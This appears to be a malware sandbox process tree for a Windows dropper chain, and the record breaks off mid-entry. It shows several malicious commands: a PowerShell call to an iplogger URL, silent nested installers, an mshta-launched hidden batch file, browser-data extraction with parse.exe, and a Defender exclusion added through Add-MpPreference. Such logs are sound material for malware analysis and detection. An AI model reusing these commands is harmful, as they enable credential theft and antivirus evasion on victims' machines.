C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
2⤵
PID:5712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
2⤵
- Drops file in System32 directory
PID:5704

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
2⤵
PID:5696

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7212

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7356

C:\Users\Admin\AppData\Local\Temp\is-GMC3J.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GMC3J.tmp\Setup.tmp" /SL5="$60418,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-GC1QF.tmp\Setup.exe" /VERYSILENT
1⤵
PID:7740

C:\Users\Admin\AppData\Local\Temp\is-DPE31.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-DPE31.tmp\def.exe" /S /UID=lab214
2⤵
PID:5724

C:\Program Files\Windows Photo Viewer\GYBQUJQQNN\prolab.exe
"C:\Program Files\Windows Photo Viewer\GYBQUJQQNN\prolab.exe" /VERYSILENT
3⤵
PID:7952

C:\Users\Admin\AppData\Local\Temp\is-UA058.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UA058.tmp\prolab.tmp" /SL5="$9079A,575243,216576,C:\Program Files\Windows Photo Viewer\GYBQUJQQNN\prolab.exe" /VERYSILENT
4⤵
PID:8084

C:\Users\Admin\AppData\Local\Temp\bb-e1279-ecc-6f086-efa8f8381c577\SHaekuxogefu.exe
"C:\Users\Admin\AppData\Local\Temp\bb-e1279-ecc-6f086-efa8f8381c577\SHaekuxogefu.exe"
3⤵
PID:6056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wklhcpia.fs5\askinstall18.exe & exit
4⤵
PID:8424

C:\Users\Admin\AppData\Local\Temp\wklhcpia.fs5\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\wklhcpia.fs5\askinstall18.exe
5⤵
PID:13108

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:9952

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:14928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vt20bz23.dse\customer4.exe & exit
4⤵
PID:10888

C:\Users\Admin\AppData\Local\Temp\vt20bz23.dse\customer4.exe
C:\Users\Admin\AppData\Local\Temp\vt20bz23.dse\customer4.exe
5⤵
PID:8488

C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"
6⤵
PID:9908

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
7⤵
- Kills process with taskkill
PID:18012

C:\Windows\regedit.exe
regedit /s chrome.reg
7⤵
- Runs .reg file with regedit
PID:18024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
7⤵
PID:20260

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
8⤵
PID:11036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX5\chrome64.bat" h"
9⤵
PID:7800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
10⤵
PID:8288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff85d6b6e00,0x7ff85d6b6e10,0x7ff85d6b6e20
11⤵
PID:8352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:8
11⤵
PID:9960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:2
11⤵
PID:9936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
11⤵
PID:10144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:1
11⤵
PID:10152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
11⤵
PID:2512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
11⤵
PID:10276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
11⤵
PID:10300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
11⤵
PID:10292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3428 /prefetch:8
11⤵
PID:10264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:8
11⤵
PID:8068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:8
11⤵
PID:2936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:8
11⤵
PID:11504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:8
11⤵
PID:11764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4192 /prefetch:8
11⤵
PID:14348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 /prefetch:8
11⤵
PID:14432

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
11⤵
PID:15408

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff790a17740,0x7ff790a17750,0x7ff790a17760
12⤵
PID:15440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4304 /prefetch:8
11⤵
PID:15400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4500 /prefetch:8
11⤵
PID:15528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4836 /prefetch:8
11⤵
PID:15612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3776 /prefetch:8
11⤵
PID:15704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3888 /prefetch:8
11⤵
PID:15916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 /prefetch:8
11⤵
PID:15908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1860 /prefetch:8
11⤵
PID:16020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3644 /prefetch:8
11⤵
PID:16084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:8
11⤵
PID:16260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3716 /prefetch:8
11⤵
PID:16192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:8
11⤵
PID:16316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=844 /prefetch:8
11⤵
PID:17752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:8
11⤵
PID:17896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3520 /prefetch:8
11⤵
PID:18288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3436 /prefetch:8
11⤵
PID:16428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:8
11⤵
PID:16492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4452 /prefetch:8
11⤵
PID:16576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3420 /prefetch:8
11⤵
PID:16636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:8
11⤵
PID:16708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:8
11⤵
PID:16788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3364 /prefetch:8
11⤵
PID:16864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:8
11⤵
PID:16880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3828 /prefetch:8
11⤵
PID:17056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:8
11⤵
PID:17124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1
11⤵
PID:17116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:8
11⤵
PID:17208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4472 /prefetch:8
11⤵
PID:17256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3720 /prefetch:8
11⤵
PID:17312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3528 /prefetch:8
11⤵
PID:17372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
11⤵
PID:17428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5148 /prefetch:8
11⤵
PID:17488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2140 /prefetch:8
11⤵
PID:17636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5540 /prefetch:8
11⤵
PID:17744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
11⤵
PID:17736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5692 /prefetch:8
11⤵
PID:17860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5824 /prefetch:8
11⤵
PID:17952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:8
11⤵
PID:18040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3432 /prefetch:8
11⤵
PID:18164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
11⤵
PID:18148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:8
11⤵
PID:18304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3836 /prefetch:8
11⤵
PID:18400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:8
11⤵
PID:18412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1588,3345084363800231539,9354446165666013834,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3932 /prefetch:2
11⤵
PID:6756

C:\Windows\regedit.exe
regedit /s chrome-set.reg
7⤵
- Runs .reg file with regedit
PID:11784

C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exe
parse.exe -f json -b firefox
7⤵
PID:15112

C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exe
parse.exe -f json -b chrome
7⤵
PID:15240

C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exe
parse.exe -f json -b edge
7⤵
PID:15308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\emiupg0r.aq0\md7_7dfj.exe & exit
4⤵
PID:10204

C:\Users\Admin\AppData\Local\Temp\emiupg0r.aq0\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\emiupg0r.aq0\md7_7dfj.exe
5⤵
PID:7760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tque1ncn.0c5\GcleanerWW.exe /mixone & exit
4⤵
PID:11472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lpzxsfpm.43w\privacytools5.exe & exit
4⤵
PID:11652

C:\Users\Admin\AppData\Local\Temp\lpzxsfpm.43w\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\lpzxsfpm.43w\privacytools5.exe
5⤵
PID:6884

C:\Users\Admin\AppData\Local\Temp\lpzxsfpm.43w\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\lpzxsfpm.43w\privacytools5.exe
6⤵
PID:10632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hnhwkbsm.3p3\setup.exe /8-2222 & exit
4⤵
PID:14128

C:\Users\Admin\AppData\Local\Temp\hnhwkbsm.3p3\setup.exe
C:\Users\Admin\AppData\Local\Temp\hnhwkbsm.3p3\setup.exe /8-2222
5⤵
PID:14528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Misty-Sunset"
6⤵
PID:14636

C:\Program Files (x86)\Misty-Sunset\7za.exe
"C:\Program Files (x86)\Misty-Sunset\7za.exe" e -p154.61.71.51 winamp-plugins.7z
6⤵
PID:18484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Misty-Sunset\setup.exe" -map "C:\Program Files (x86)\Misty-Sunset\WinmonProcessMonitor.sys""
6⤵
PID:8968

C:\Program Files (x86)\Misty-Sunset\setup.exe
"C:\Program Files (x86)\Misty-Sunset\setup.exe" -map "C:\Program Files (x86)\Misty-Sunset\WinmonProcessMonitor.sys"
7⤵
PID:9308

C:\Program Files (x86)\Misty-Sunset\7za.exe
"C:\Program Files (x86)\Misty-Sunset\7za.exe" e -p154.61.71.51 winamp.7z
6⤵
PID:11748

C:\Program Files (x86)\Misty-Sunset\setup.exe
"C:\Program Files (x86)\Misty-Sunset\setup.exe" /8-2222
6⤵
PID:13752

C:\Program Files (x86)\Misty-Sunset\setup.exe
"C:\Program Files (x86)\Misty-Sunset\setup.exe" /8-2222
7⤵
PID:14220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ju1e00d.whc\MultitimerFour.exe & exit
4⤵
PID:14196

C:\Users\Admin\AppData\Local\Temp\5ju1e00d.whc\MultitimerFour.exe
